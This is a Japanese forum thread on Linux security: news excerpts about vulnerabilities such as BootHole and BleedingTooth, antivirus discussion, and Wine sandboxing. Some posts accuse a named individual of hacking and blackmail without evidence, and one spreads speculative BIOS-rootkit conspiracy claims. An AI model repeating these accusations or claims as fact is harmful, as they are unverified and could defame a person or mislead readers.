攻撃者が必要とするのは、5 分間コンピュータと一緒にいるだけで、ドライバーと簡単に持ち運べるハードウェアだけです。

私たちは、インテルの設計に7つの脆弱性を発見し、悪意のある者がインテルが設定した防御機能を超えてシステムにアクセスするために、
これらの脆弱性が悪用される可能性のある9つの現実的なシナリオを開発しました。

私たちは、システムが脆弱であるかどうかを判断するために、無料でオープンソースのツール、Spycheckを開発しました。
システムが脆弱であることが判明した場合、Spycheck はシステムを保護するための推奨事項を案内します。

[0195 login:Penguin 2020/06/09(火) 22:48:42.11 ID:bAdCtyAo]

【AndroidでLinux】UserLAnd part1【root化不要】
https://egg.5ch.net/test/read.cgi/android/1591710049/

UserLAndは、Android上でUbuntu、Debian、Kaliなどの各種Linuxを動かせるアプリです。
オープンソースアプリです。
root化なしで動かせます。

公式
https://userland.tech/
ソースコード
https://github.com/CypherpunkArmory/UserLAnd
ダウンロード
https://f-droid.org/packages/tech.ula

[0196 login:Penguin 2020/06/23(火) 19:33:45.38 ID:2tiPRdzD]

【独自】マイナンバーとスマホ 連携検討　免許証と連携に加え
6/23(火) 12:00

政府が、マイナンバーカードとスマートフォンの一体化を検討していることがわかった。(略

https://headlines.yahoo.co.jp/videonews/fnn?a=20200623-00155385-fnn-pol

[0197 login:Penguin 2020/06/23(火) 20:04:29.14 ID:ok+f0TXB]

行動追跡か。

[0198 login:Penguin 2020/06/30(火) 16:28:14.49 ID:kYjLj6sM]

これandroidもじゃね？

【悲報】　TikTok、キーロガーだった [787645228]
https://leia.5ch.net/test/read.cgi/poverty/1593149876/
iOS 14でバッチリ可視化、TikTokが「他アプリで入力中のテキスト」を逐一読み取る様子
https://internet.watch.impress.co.jp/docs/yajiuma/1261591.html

[0199 login:Penguin 2020/06/30(火) 16:29:04.04 ID:kYjLj6sM]

Facebook、匿名化OS「Tails」ユーザーの正体暴く技術を開発　米FBIへ提供していたことが明らかに

匿名化技術を駆使して性犯罪を行う容疑者をFBIが逮捕
Facebookが数千万円で攻撃プログラムを開発依頼

　他に打つ手がなかったFacebookのセキュリティチームは、あるサイバーセキュリティ会社に数千万円の費用を支払ってTails向けの攻撃プログラムの開発を依頼する（この企業の名前は明かされていない）。その内容は、Tailsが備える匿名化技術を「ゼロデイ攻撃」（未公開の脆弱性を狙う攻撃手法）によって破り、発信元を特定するものだ。使われたゼロデイの脆弱性はTailsにインストールされている動画プレーヤーに存在していた。

　Facebookはこの攻撃ツールを仲介者を通してFBIに渡した。FBIは被害者の協力を得てこのプログラムが仕込まれた動画ファイルを容疑者に送信し、発信元の追跡に成功した。FBIはこの件についてコメントを控えている。

　Tailsを開発するチームは、同容疑者に関する捜査や脆弱性について全く知らされていなかったという。Facebookは最終的にこの脆弱性を開発チームに報告する予定だったが、その間に脆弱性は修正されたという。ただし、Tailsの開発チームは脆弱性として認識していたわけではなく、開発の過程で結果的に修正されたようだ。

https://www.itmedia.co.jp/news/articles/2006/30/news078.html

[0200 login:Penguin 2020/06/30(火) 21:13:07.57 ID:iYUEZH57]

>>199
>>379-380
被害者が動画送ってそれを
tailsの動画プレイヤーで見たらしいな
動画プレイヤーの脆弱性らしいよ

動画プレイヤーに仕掛けられてたバックドアにゼロデイ攻撃だね

ソース読んでチェックしてるのかよ>tailsのやつ

[0201 login:Penguin 2020/07/03(金) 16:56:34.27 ID:WzAdi1H0]

・Signal以上に超安全な暗号化チャットと思われていた「EncroChat」、欧州警察によるマルウェアにより一網打尽 [787645228]
https://leia.5ch.net/test/read.cgi/poverty/1593759309/

https://jp.techcrunch.com/2020/07/03/2020-07-02-police-roll-up-crime-networks-in-europe-after-infiltrating-popular-encrypted-chat-app/
https://techcrunchjp.files.wordpress.com/2020/07/operation-venetic.jpg
、

[0202 login:Penguin 2020/07/04(土) 16:44:07.77 ID:NLPCRgkT]

Tor VPN 最強の匿名通信方法を考えるスレ1 匿名支払
https://medaka.5ch.net/test/read.cgi/sec/1593848365/

[0203 login:Penguin 2020/07/30(木) 20:54:33.24 ID:CUYmulWq]

ほぼすべてのLinuxのブートローダーに脆弱性 - PC Watch
https://pc.watch.impress.co.jp/docs/news/1268335.html

　米セキュリティ企業のEclypsiumは7月29日(現地時間)、GRUB2ブートローダーに存在する脆弱性「BootHole」について報告した。
　GRUB2は、多くのLinuxディストリビューションで利用されているブートローダー。そのため、BootHole(CVE-2020-10713ほか)の影響は広範囲におよび、セキュアブートを有効にしている場合でも悪用が可能だという。
各ベンダーに事前に通達済みで、同日よりアドバイザリーやアップデートが順次提供される予定。
　設定ファイルである「grub.cfg」をGRUB2が読み出すプロセスにおいて、バッファオーバーフローの脆弱性が存在する。grub.cfgはEFIシステムパーティション内部にあるテキストファイルで、管理者権限を得た攻撃者によってブートローダー本体の整合性を保ったまま変更できる。
　バッファオーバーフローを悪用することで、攻撃者はUEFI実行環境内において任意のコードが実行可能。マルウェアの実行やブートプロセスの変更、永続的かつステルスなブートキットの導入などができるようになる。
OSの読み込みより前に攻撃者によるコードを実行できてしまうため、実質的にデバイスを完全制御下に置けるかたちとなる。
　緩和策としては、GRUB2自体の更新などが必要となるほか、セキュアブートではコンポーネントの検証プロセスにおいてMicrosoftによる電子署名が広く利用されているため、同社によるアップデートも提供される見込み。
　ブートローダーはその特性上、更新時のトラブルによってデバイスが起動不可に陥る場合もあるため慎重に進める必要があるが、BootHoleは特権昇格の脆弱性を通じて悪用が可能な脆弱性であることから、EclypsiumではまずはOS自体のアップデートを適宜行なうことを推奨している。

（全文引用、改行適当挿入）

[0204 login:Penguin 2020/07/30(木) 21:34:45.02 ID:tMJ70ZQJ]

>管理者権限を得た攻撃者
俺も管理者権限持ってれば俺のgrubなんて容易に改変可能なのだが、、

[0205 login:Penguin 2020/07/31(金) 12:13:41.62 ID:f4vH+ZVs]

AMDに脆弱性ガーと同じ原理じゃないか…
(裏でIntelが出資した某アホ研究会社…と同じ)

ミッションインポッシブルできるわけがないわけで…

[0206 login:Penguin 2020/08/03(月) 19:28:23.41 ID:A0D9Xhej]

https://mao.5ch.net/test/read.cgi/linux/1593922337/574
574 名前：login:Penguin [sage]： 2020/07/28(火) 02:27:19.00 ID:1WEp4Dpz (2)
かつてデル男に、「ホモ男」「Dion君」などと呼ばれていた者です。
デル男が志賀だという状況証拠を提示したのも私です。
デル男の活動が活発だった頃の末期に、うっかりIPアドレス（固定IP）を
晒したばっかりに、デル男にポート総当り攻撃を仕掛けられ、ルーターに
侵入され、PCに侵入され個人情報を盗まれました。
HDDのOSがアクセスできない領域にキーロガー等を仕込まれたらしく、
今でも情報を盗まれています。
その後、志賀のライセンス違反が発覚し、私はまとめサイトの記事を書いたり
比較的積極的に志賀のライセンス違反拡散活動に従事しているのですが、
その度に盗まれた個人情報をちらつかせて脅されます。
この、デル男→ライセンス違反の流れの中での私のクラッキング被害の連続性から言って、
志賀＝デル男だと断言できます。

[0207 login:Penguin 2020/08/03(月) 19:28:36.94 ID:A0D9Xhej]

https://mao.5ch.net/test/read.cgi/linux/1593922337/594
594 名前：574 [sage]： 2020/07/29(水) 10:27:37.36 ID:MGMjPdwp
>>574です。
私は発達障害を持っています。私の個人情報を盗んでいる志賀も、もちろんそのことを知っています。
そして、志賀は、Ubuntuスレで「ハッタツ君」というキャラを産み出しました。そしてしつこく登場させました。
これは明らかに、活発に志賀ライセンス違反の拡散活動を行う私への暗示的な当てつけ＆脅しです。
このように志賀は、犯罪行為を行うだけでなく、中傷のために差別的言動を平然とします。
知性ある人間の行動には程遠いです。

[0208 login:Penguin 2020/08/05(水) 21:20:23.06 ID:brKuFFFW]

志賀慶一の存在自体がセキュリティリスクです

[0209 login:Penguin 2020/08/21(金) 22:49:04.88 ID:T1X/iY5P]

NSAとFBI、Linux向けマルウェア「Drovorub」に関するアドバイザリを公開

「Drovorub」の拡散はロシアの情報機関であるGRU（参謀本部情報局）と関連のあるAPT28（別名Fancy Bear、Strontiumなど）の手によるもので、スパイ活動および公共機関やIT企業から機密情報を盗みだすことを目的に行われているという。
https://news.mynavi.jp/article/20200818-1232625/

[0210 login:Penguin 2020/10/05(月) 13:25:20.50 ID:NkCuixWc]

あー　おにゃのこなめたいおにゃのこなめたい

[0211 login:Penguin 2020/10/10(土) 01:54:37.19 ID:g39SN+yC]

Google、「特定の住所を検索した人」のIPアドレスを警察に提供 [618676474]
https://leia.5ch.net/test/read.cgi/poverty/1602256833/


検索履歴は極めて個人的なことを暴いてしまうものであり、警察がこのセンシティブな情報を要求するには通常、
既知の容疑者に対する令状が必要だ。しかし、最近公開された裁判所文書により、捜査当局が容疑者を特定する前に、
あるキーワードを検索した全ユーザーの情報を開示することをGoogleに要請できることが明らかになった。

警察は8月、性的暴行の罪で起訴されている歌手のR. Kelly被告の関係者であるMichael Williams容疑者を、
フロリダ州で目撃者の車に火をつけたとして逮捕した。捜査当局は、「放火があった時刻近くに当該住宅の住所を検索した
ユーザー」に関する情報を要請する捜査令状をGoogleに送付した後、Williams容疑者を放火と証人買収の罪に関連付けた。

この7月の裁判所文書は米国時間10月6日に公開され、Detroit NewsのRobert Snell記者がこの文書についてツイートした。
裁判所文書には、放火の被害者の住所を検索した人のIPアドレスをGoogleが提供し、それが容疑者の電話番号と
関連していることを捜査当局が発見したと書かれている。警察はその後、その電話番号の履歴をたどって、
放火現場の近くにあったWilliams容疑者の端末の位置を特定したという。

Googleに送られた捜査令状の原本はまだ公開されていないが、今回のことは、捜査当局がGoogleに対して、1人の容疑者に
関する特定の情報ではなく、大きなユーザーグループに関するデータを要請する傾向が高まっていることを示す新たな例となった。

https://news.yahoo.co.jp/articles/588b07e1451ee9a978edf2ffd4dc812846d02b12

[0212 login:Penguin 2020/10/12(月) 13:10:55.07 ID:xKjywmC1]

　機密情報を共有する5カ国協定、いわゆる「ファイブアイズ」の参加国（米国、英国、カナダ、オーストラリア、ニュージーランド）が、日本およびインドの政府代表と連名で声明を発表した。テクノロジー企業に向けて、エンドツーエンドの暗号化された通信に法執行機関がアクセスすることを可能にする解決策の開発を要請している。

　この声明は、暗号にバックドアを設けることをテクノロジー企業に同意させようとする、ファイブアイズの最新の取り組みだ。

　各国の政府関係者はこれまでと同様、テクノロジー企業が製品にエンドツーエンド暗号化（E2EE）を組み込むことで犯罪捜査が困難になったと主張している。

　7カ国の政府代表は、現在の主要なテクノロジープラットフォームでサポートされているE2EEの仕組みのために、法執行機関が犯罪組織を捜査できないばかりか、テクノロジープラットフォーム各社も、一般市民を守るためのサービス利用規約を守らせることができずにいると主張している。

　声明では、「暗号化技術の特定の実装」によって、法執行機関の捜査に問題が生じているとしている。テクノロジープラットフォーム各社も一部の通信内容にアクセスできず、捜査当局に必要なデータを提供できないからだ。

　これにより、犯罪活動にとって安全な避難場所の確保を許し、「性的に搾取されている児童など、われわれの社会の中でも特に弱い立場の人々」を危険にさらしてしまうという。

　7カ国はテクノロジー業界と協力し、ユーザーが引き続き安全で暗号化された通信を利用できるだけでなく、法執行機関とテクノロジー企業も犯罪活動を取り締まれる解決策を開発するよう尽力していくとした。

　暗号化されたインスタントメッセージアプリだけではなく、「デバイスの暗号化、カスタム暗号化アプリ、統合プラットフォーム全体の暗号化」も対象となるという。

　2018年には、オーストラリアが主要な民主主義国家の中で初めて「反暗号化法」を導入した。同様の取り組みは米国や欧州でもあったが、そこまで成功しなかった。主な理由は、テクノロジー企業や非営利団体、一般市民からの反発だ。

　しかし、西側の政府が機密情報の収集能力で中国と対等になろうとする中、オーストラリアと同様の対応を求める圧力が近年高まっている。

https://japan.cnet.com/article/35160775/

[0213 login:Penguin 2020/10/18(日) 06:38:34.76 ID:f07qlYZ2]

LinuxのBluetoothスタックに任意コード実行可能な脆弱性か 2020/10/17 19:31 著者：後藤大地
https://news.mynavi.jp/article/20201017-1419370/

Intelは10月13日(米国時間)、「INTEL-SA-00435 - BlueZ Advisory」において、同社が提供する
Bluetoothスタックの一部である「BlueZ」 をサポートする Linux Kernel 5.9 より前のすべてのバー
ジョンに、特権昇格や情報窃取につながる潜在的な脆弱性が存在すると伝えた。Intelは3つの脆弱性を
報告しており、うちひとつは深刻度が重大（High）に分類されている。

攻撃者が物理的にデバイスに接近できる場合、この脆弱性を悪用した攻撃を受ける危険性があるほか、
Linuxカーネルを使ったIoTデバイスが影響を受ける可能性がある。ただし、脆弱性の詳細情報はまだ
公開されていない。この脆弱性を突いた攻撃がどのように実施されるのか、今後の詳細な報告が待た
れる。

情報セキュリティエンジニアのAndy Nguyen氏がTwitterで報告したメッセージによれば、脆弱性の
詳細は「Google Online Security Blog」に掲載されるという。同氏はこの脆弱性のPoCと見られる
動画のURLもツイートしているが、その動画では近接するLinux PCに対してこの脆弱性を悪用して任意の
コードが実行される様子が示されている。この脆弱性は「BleedingTooth」と呼ばれている。(後略)

[0214 login:Penguin 2020/10/19(月) 02:27:59.47 ID:d+5XKEVu]

東芝が「究極の暗号」、「量子暗号」サービスを開始すると発表 [256556981]
https://leia.5ch.net/test/read.cgi/poverty/1603035516/

1 番組の途中ですがアフィサイトへの転載は禁止です (ﾜｯﾁｮｲW 9fae-NK1U) 2020/10/19(月) 00:38:36.15 ID:dfhMI9gI0 BE:256556981-2BP(1000)

東芝が「究極の暗号」サービス　米英で提携、シェア首位狙う

　東芝は19日、盗聴やハッキングが理論上不可能とされる「量子暗号」を利用できる企業向けサービスを2025年度までに国内外で始めると発表した。海外では米ベライゾン・コミュニケーションズ、英BTグループの通信大手と相次ぎ提携し、今年9月からそれぞれ現地で実証実験を開始。シンガポール、韓国などの通信事業者とも協議を進めており、次世代の「究極の暗号」技術で世界トップシェアを狙う。

　東芝は米英で提携先の光ファイバー回線を使い、大容量データの量子暗号化や解読に必要な「鍵」の送受信、模擬の不正アクセスなどを実施。ベライゾンやBTと結果を検証するなど、国内外で量子暗号を使う情報保全事業の立ち上げを急ぐ。英中部ケンブリッジでは年内に関連機器の製造拠点を設ける。

　スーパーコンピューターの性能をはるかに上回る量子コンピューターが30年代にかけて実用化されると、現在の暗号は破られるリスクが高まる。国内では量子暗号導入に向けた総務省の実証事業を約43億円で受注。21年4月に着手する。防衛省や警察庁への導入も視野に入れる。

　先行する中国、米国勢をにらみ、安全保障分野などで情報保全の飛躍的向上を後押しする。東芝はさらに、金融、医療をはじめ高い秘匿性が要求される民間利用を見込んで、国内通信大手との提携につなげたい考えだ。　
https://news.yahoo.co.jp/articles/877338e6321824faf04486997698ac8141263cc3

[0215 login:Penguin 2020/10/22(木) 03:35:06.10 ID:i7lwsGnq]

sophos linux版が消えたの普通に痛くね

[0216 login:Penguin 2020/10/22(木) 12:20:01.34 ID:Q5k2CXke]

>>215
痛すぎ
他に代替ないんだもん
怪しい会社ばっか

でも、すでにインストールされてるsophosを
１ヶ月ぐらい前に確認したら
ウイルス定義ファイルはまだ更新してくれてた

[0217 login:Penguin 2020/10/22(木) 13:33:41.69 ID:7lHMDkpq]

clamavじゃいかんのか？

[0218 login:Penguin 2020/10/22(木) 19:10:54.64 ID:n7zgsOXk]

え、消えたの…?と思ってぐぐったらマジで消えてた…

[0219 login:Penguin 2020/10/22(木) 23:22:50.98 ID:f4SsAYem]

clamavは比較対象にもならない
まあ有料版はあるんだが、どれだけ無料版に頼ってたかって話だな…

[0220 login:Penguin 2020/10/22(木) 23:39:19.14 ID:Q5k2CXke]

>>217
あれは検出力糞すぎらしい

[0221 login:Penguin 2020/10/22(木) 23:42:10.46 ID:Q5k2CXke]

>>219
有料版って２０個ぐらいのライセンスセットみたいのばっかじゃない？
１個ずつ買えんのかね
ノートンも1ずつ買えんよねえ

[0222 login:Penguin 2020/12/17(木) 13:33:45.76 ID:JiJqFrlO]

〆 川 ヽ
(´・ω・｀) .｡ｏＯ（熟女専科…)
（U　　　)
　｀ｕ-ｕ´

[0223 login:Penguin 2021/01/10(日) 23:12:08.13 ID:a8QEqhHY]

あけおめ。

[0224 login:Penguin 2021/01/11(月) 20:36:24.74 ID:+FRlrpZ3]

...【セキュリティ】Air-Fi：隔離されたコンピューターからデータを盗み出す [すらいむ★]

Air-Fi：隔離されたコンピューターからデータを盗み出す
Wi-Fi対応ではないコンピューターでもWi-Fiで情報を送信できる
https://blog.kaspersky.co.jp/air-fi-data-exfiltration/29846/

https://egg.5ch.net/test/read.cgi/scienceplus/1610070895/

[0225 運用情報臨時板でワッチョイ導入議論中 2021/02/25(木) 20:22:24.28 ID:nQxAiBdW]

sophosはインストーラー持ってれば新規インストールもできる

[0226 運用情報臨時板でワッチョイ導入議論中 2021/02/25(木) 23:14:03.57 ID:KC6htJgv]

>>225
そこが不思議だよな
ウイルス定義ファイルも更新され続けてるし

ユーザー増えると負荷かかりすぎるのかねえ

[0227 運用情報臨時板でワッチョイ導入議論中 2021/03/09(火) 22:31:27.07 ID:nUzJdA9A]

「Linux 5.12 rc1に厄介なバグ」、トーバルズ氏が警告
https://japan.zdnet.com/article/35167530/

[0228 login:Penguin 2021/05/02(日) 18:37:43.87 ID:04bhmCI/]

彡⌒ミ〆川 ヽ
(´･ω･`)･ω･`)　
/　　つ⊂　　 ＼　　怖いずら

[0229 login:Penguin 2021/05/04(火) 00:10:22.32 ID:xLDS/IIK]

sophosインストーラー持ってる奴勝ち組

[0230 login:Penguin 2021/05/04(火) 04:03:48.33 ID:q021lZ4A]

>>229
マジでこれ

いまだにウイルス定義最新版に更新できるもんな

なんでインストーラーダウンロード打ち切ったんだろう？

ウイルス定義更新するならダウンロード出来るようにしとけばいいのに

[0231 login:Penguin 2021/05/04(火) 04:04:04.40 ID:q021lZ4A]

>>229
マジでこれ

いまだにウイルス定義最新版に更新できるもんな

なんでインストーラーダウンロード打ち切ったんだろう？

ウイルス定義更新するならダウンロード出来るようにしとけばいいのに

[0232 login:Penguin 2021/05/10(月) 22:45:29.33 ID:b1KDMEzk]

ここの>>28ぐらいからのレスバがすごいｗｗ

【徹底討論】 Linuxにバックドアはあるのか？
s://mao.5ch.net/test/read.cgi/linux/1558455408/28

[0233 login:Penguin 2021/05/20(木) 23:28:35.36 ID:OX3aECUm]

最近Windowsから移行していろいろ調べた結果eset NOD32にしたんだがどうだろう？
国内代理店のキヤノンが売ってくれないからVPN使ってインド版サイトで買ったよ

[0234 login:Penguin 2021/05/21(金) 19:31:08.07 ID:xce5GRbW]

セキュリティ担当の皆様へ

昔に比べて、ブートに必要な記憶領域が増えています
UEFIのESP領域やBIOSの記憶領域等が大幅に増えています
そうした規格を構築したのがインテルとビル・ゲイツです
セキュリティ問題の本質はそこにあります

即ちBIOSのROMとEFIに関連する記憶領域を組み合わせて
OSに関係なく、ブートからマシンを乗っ取る
ルートキットを仕込むことが可能なのです

そんな事あるわけない、と思うかもしれませんが
今回デルが発表したBIOS-ROMのセキュリティ問題は
その可能性を示唆しているように思います

デルは麦軍との関係が強い企業です
元MSAのスノーデンは表向きデルの職員として活動にあたりました
ロシアや中国、北朝鮮なども諜報活動を行っていますが
世界一の諜報活動を行っているのは麦軍なのです

危険ですよ！と騒ぐうちに提供される更新ファイルも
本当に安全なのか、確認するべきです
新たなルートキットを仕込まれた可能性もあります

あくまでも可能性の話ではありますが、ご注意を

[0235 login:Penguin 2021/05/21(金) 21:37:11.60 ID:bqJgvTZ1]

変なやつが来たなぁ・・・

[0236 login:Penguin 2021/05/21(金) 23:03:50.32 ID:kE2Dnilb]

ひろゆき「バイオス仕込みのスパイウェアとかアップデートしたら消えちゃうんでどの道仕込むの難しいんですよね
ハードウェアで仕込むとわかる人にはバレちゃうし」

[0237 login:Penguin 2021/05/22(土) 15:45:02.63 ID:rJ8gSmbP]

むぎむぎぐんってなに

[0238 login:Penguin 2021/07/10(土) 17:38:46.38 ID:Lj3ceuFs]

　　　　.｡ｏＯ（ ｱｯ ｿｺｿｺ… )
　 ＜,⌒／ヽ-、_＿_　
／＜,3/＿＿＿＿／
￣￣￣￣￣￣￣

[0239 login:Penguin 2021/07/10(土) 19:33:16.40 ID:U/4q+Z75]

Linux Defenderはよ

[0240 login:Penguin 2021/07/19(月) 18:26:39.28 ID:rfzbIh30]

Is Open-Source Software Secure?
The code is open, anyone can see it. Is it a security risk?

July 18, 2021
It's FOSS

[0241 login:Penguin 2021/07/19(月) 18:29:04.47 ID:rfzbIh30]

>>240
Why Should You Care if Open-Source Software is Secure?

No matter whether you use Linux or any other operating system, you will be surrounded with open-source software in some way (directly/indirectly).

To give you an example, most of the proprietary software tools depend on some form of open-source libraries to make things work.

Furthermore, there is a reason why companies of various scale (including Google, Microsoft, and Facebook) rely on open-source software or contribute their resources to the open-source community in one way or the other.

Hence, the security of open-source software is something essential to know about.

[0242 login:Penguin 2021/07/19(月) 19:35:13.95 ID:rfzbIh30]

>>241
なぜ、オープンソース・ソフトウェアが安全かどうかを気にする必要があるのでしょうか？

Linuxやその他のOSを使用していても、何らかの形で（直接的または間接的に）オープンソース・ソフトウェアに囲まれているはずです。
例えば、ほとんどのプロプライエタリなソフトウェアツールは、何らかの形でオープンソースのライブラリに依存して動作しています。

さらに、Google、Microsoft、Facebookなどの様々な規模の企業が、何らかの形でオープンソース・ソフトウェアに依存したり、自社のリソースをオープンソース・コミュニティに提供したりしているのには理由があります。

そういうことですから、オープンソース・ソフトウェアのセキュリティについては、知っておかなければならないことなのです。

[0243 login:Penguin 2021/07/19(月) 19:43:03.04 ID:rfzbIh30]

>>242
セキュリティの観点からオープンソース・ソフトウェアの短所を指摘する議論はいくつかありますが、中には全く意味をなさないものもあります。

「誰でもコードを見たり、悪用したりできる」
確かに、コードは誰でもアクセスできます。しかし、コードを見ることができるからといって、誰もがそれを悪用できるということでしょうか。そうではありません。

誰でもソフトウェアのフォーク（コピー）を作ることができても、オリジナルのソフトウェアを簡単に操作することはできません。

通常、プロジェクトのメンテナ（またはそのグループ）は、コードリポジトリを管理し、貢献者からのコミットを受け入れます。コードは承認前にレビューされます。そして、誰もが簡単にコードを乗っ取ることはできません。

オープンソース、クローズドソースを問わず、攻撃者がソフトウェアの脆弱性を突いたり、悪意のあるコードを追加したりするには努力が必要です。

[0244 login:Penguin 2021/07/19(月) 20:55:10.63 ID:rfzbIh30]

>>244
たとえコードが開発者の世界でアクセス可能であっても、プロジェクトにはコードを徹底的にレビューできるだけの貢献者や開発者がいない可能性があります。

そのような場合、オープンソース・ソフトウェアが査読されていることに大きな自信を持つことはできませんが、まさにそれが欠けているからです。

オープンソース・ソフトウェアは、オープンソースであることを理由に、最高のセキュリティを備えていると「主張」するかもしれませんが、十分な数の開発者がいない場合には誤解を招くことになります。

また、何人の開発者がコードを見ているのか、レビューしているのか、コードのウォークスルーがどのように行われているのかもわかりません。

[0245 login:Penguin 2021/07/19(月) 20:59:28.98 ID:rfzbIh30]

>>243-244
セキュリティに関して、優れたものはありません。クローズドソースであろうとオープンソースであろうと、セキュリティに関しては同じ原理が適用されます。

ソフトウェアのセキュリティに影響を与える外部要因には様々なものがありますが、その多くはソースに依存しません。安全性を保つためには、同じようにコードを監視する必要があります。

確かに、オープンソースのアプローチは、クローズドソースのソフトウェアにはないメリットを導入していますが、だからといって防弾仕様というわけではありません。

（以上、重要箇所のみ訳出掲載しました -- Creative Commons Attribution-ShareAlike 4.0 International License.）

[0246 login:Penguin 2021/07/20(火) 18:07:35.12 ID:RJeOgDMv]

これもID:0slAOwnDかな。

http://mao.5ch.net/test/read.cgi/linux/1465741067/245
> 245：login:Penguin 2021/07/19(月) 20:59:28.98 ID:rfzbIh30
中略
> （以上、重要箇所のみ訳出掲載しました -- Creative Commons Attribution-ShareAlike 4.0 International License.）

勝手に翻訳してitsfoss.comの権利を侵害し、勝手にクリエイティブ・コモンズにして5chの権利も侵害しとる

>>367
ID:0slAOwnDみたいに海外記事を勝手に機械翻訳して書き込む輩はどんどん出てくるだろうし、その都度削除依頼するのも切がないかと。
俺らにできるのはそういう輩をバカにするぐらいじゃね。

[0247 login:Penguin 2021/07/20(火) 18:08:21.92 ID:RJeOgDMv]

ええ…

[0248 login:Penguin 2021/08/19(木) 23:19:26.37 ID:uxuTKr2E]

壁|ωﾟ )┻┛ あー　おにゃのこなめたい おにゃのこなめたい …

[0249 login:Penguin 2021/08/24(火) 22:51:02.61 ID:wtZMW9lc]

カーネル5.11.0-27で、マシンがめっちゃ熱くなったりフリーズしたりするようになった
sophosをアンインストールしたら静かになったので、まあ間違いなく原因だわ…

[0250 login:Penguin 2021/09/09(木) 14:43:27.01 ID:C0tKvDkQ]

OpenSSL 3.0リリース、ライセンスをApache License 2.0に変更 | TECH+
https://news.mynavi.jp/article/20210908-1967718/

[0251 login:Penguin 2021/09/09(木) 21:07:51.58 ID:TMHDLSeT]

Dockerとかコンテナのセキュリティのためのベストプラクティス的な資料を作りたいんですが、
何か参考になる書籍でオススメとかあったら教えて頂けませんでしょうか？

[0252 login:Penguin 2021/09/10(金) 00:53:44.40 ID:3qQOXhMB]

既にある物を作る意味とは？

[0253 login:Penguin 2021/09/10(金) 10:00:50.10 ID:8Sb2Dt5o]

表現方法で変わるから 漫画で書いたりとかじゃないかな

[0254 login:Penguin 2021/09/28(火) 05:31:10.45 ID:jjeqVEuU]

RedditにRaspberryPiを対象にしたランサムウェアがあるかという質問があり
そういうものは無いというのがスレの見解になってましたが
Linuxを対象にしたランサムウェアがあり、ARM対応のランサムウェアもあるようです
両方合わせたらRaspberryPiOSを対象にしたランサムウェアが作れると思うのですが、なぜ未だに無いのでしょうか？
処理速度が遅い上に重要ファイルを預けるデバイスではなく、感染したらSDカード交換すれば復旧するものだからですか？

[0255 login:Penguin 2021/09/28(火) 05:41:25.88 ID:+rPcBB0M]

DELLのPCを対象にしたランサムウェアがあるか
と同じ話な気がするけどなあ

[0256 login:Penguin 2021/10/13(水) 12:17:36.76 ID:QMedILWp]

脆弱性スコアはそれほどでも無いけど更新は来るかな

CVE-2021-41617 : sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalatio
https://www.cvedetails.com/cve/CVE-2021-41617/

[0257 login:Penguin 2021/11/19(金) 12:50:54.81 ID:tx8Tq3HI]

　　　　　　　＿＿＿
　　　　　 　(＼ ∞ ﾉ　　
　　　　　　　ヽ)＿ﾉ　

[0258 login:Penguin 2022/02/25(金) 16:25:55.78 ID:UqNZguHP]

>>233
俺もリアルタイムスキャン有効にして入れたが鬼重くなったよ。
全く現実的ではない。

[0259 login:Penguin 2022/03/07(月) 23:53:18.14 ID:Vza7/K3I]

Linuxのコンテナ技術にエスケープの脆弱性、アップデートを - 記事詳細｜Infoseekニュース
https://news.infoseek.co.jp/article/mynavi_2378065/

[0260 login:Penguin 2022/03/09(水) 22:00:41.68 ID:aQk8QjzH]

エスケープ？

[0261 login:Penguin 2022/03/10(木) 00:05:05.06 ID:tQm505Oh]

コンテナからお漏らしするってことだろ

[0262 login:Penguin 2022/03/16(水) 02:32:45.72 ID:+CfXCT5Z]

wineって仮想環境ですよね？
wine内でランサムウェアが起動した場合、wine外には広がらないのでしょうか？
仮想環境の入れ子にして、ホストLinuxゲストLinuxでゲストにwine
という形にしたらアンチウイルスなくても感染ブロックできますか？

[0263 login:Penguin 2022/03/16(水) 02:58:45.74 ID:pHTLQHYt]

>>262
なんでそう思うの？

[0264 login:Penguin 2022/03/16(水) 20:59:03.15 ID:hlky3M2L]

Wineで動作する想定のそれがあったらどうかと考えると

[0265 login:Penguin 2022/03/16(水) 21:41:55.56 ID:YlrPIZEh]

すごい古い記事だけど。
WineでWindowsウィルスを動かす
https://mag.osdn.jp/05/01/31/0346216

[0266 login:Penguin 2022/03/16(水) 22:24:54.95 ID:YOcrTJTS]

Wineは仮想環境ではない
Wineはエミュレータではない
Wineは互換性レイヤー

[0267 login:Penguin 2022/03/16(水) 23:29:19.22 ID:N+UZSh6o]

>互換レイヤー
ふわっとした理解だけど
発行されたWindowsAPIへのアクセスをLinuxシステムコールに変換する
＋互換のない・不足するAPIやサブシステムを補完する
って感じなんだろうか…？
物理マシンとは別のカーネルが動くのではなく
カーネルにWinのバイナリの言葉を翻訳して渡す感じ…？

[0268 login:Penguin 2022/03/19(土) 16:06:29.72 ID:jttyZDwc]

ざっくりいうとそんなかんじ

[0269 login:Penguin 2022/03/20(日) 00:23:55.05 ID:x64/Dmdi]

Winのアプリの脆弱性をついた攻撃もLinuxに反映される？

[0270 login:Penguin 2022/03/21(月) 20:34:59.19 ID:uF2U5kCh]

例えばどんな脆弱性

[0271 login:Penguin 2022/03/21(月) 23:58:27.98 ID:uhwbkFCX]

>>265
この記事を今書いたらウイルス作成罪で逮捕されるよね

[0272 login:Penguin 2022/03/24(木) 08:09:59.52 ID:ywqC7Lz4]

たとえばC/C++で書かれたプログラムでメモリ破壊が起きる脆弱性とかがそのまま再現されるとか
Wineってサンドボックスじゃないんでしょ？

[0273 login:Penguin 2022/03/24(木) 09:08:40.06 ID:ltaF4EoS]

wine自体はサンドボックスではない。
一方でwineをサンドボックスの中で実行することは可能。
一般ユーザーの権限で実行すれば一般ユーザーの触れる部分しかさわれない。
コンテナで実行すればコンテナから見える部分しか関与できない。
セキュリティ設定下で実行すれば制限された権限しか使用出来そうない。
総じて使い方次第。

[0274 login:Penguin 2022/03/31(木) 02:27:55.21 ID:6gTUptRM]

メモリ破壊ってなんやねん。
wine自体の脆弱性でやられることはあっても、Windowsの脆弱性でやられることはないだろ。

[0275 login:Penguin 2022/03/31(木) 03:38:11.81 ID:3Q2itE4U]

例えば wine の中で microsoft office 動かしたとして、excel のマクロで書かれたウィルスとかは当然機能する。
アプリが乗っ取られれば meltdown ようなハードを対象とした攻撃ができる。
その他にアプリの穴をついてロボットを仕込むとかも可能。
一方で windows kernel や windows の起動システムやサービスに対する攻撃はできない。そもそんなものは存在しないので。

[0276 login:Penguin 2022/03/31(木) 03:44:33.44 ID:6gTUptRM]

>>275
meltdownで何ができんのよ？

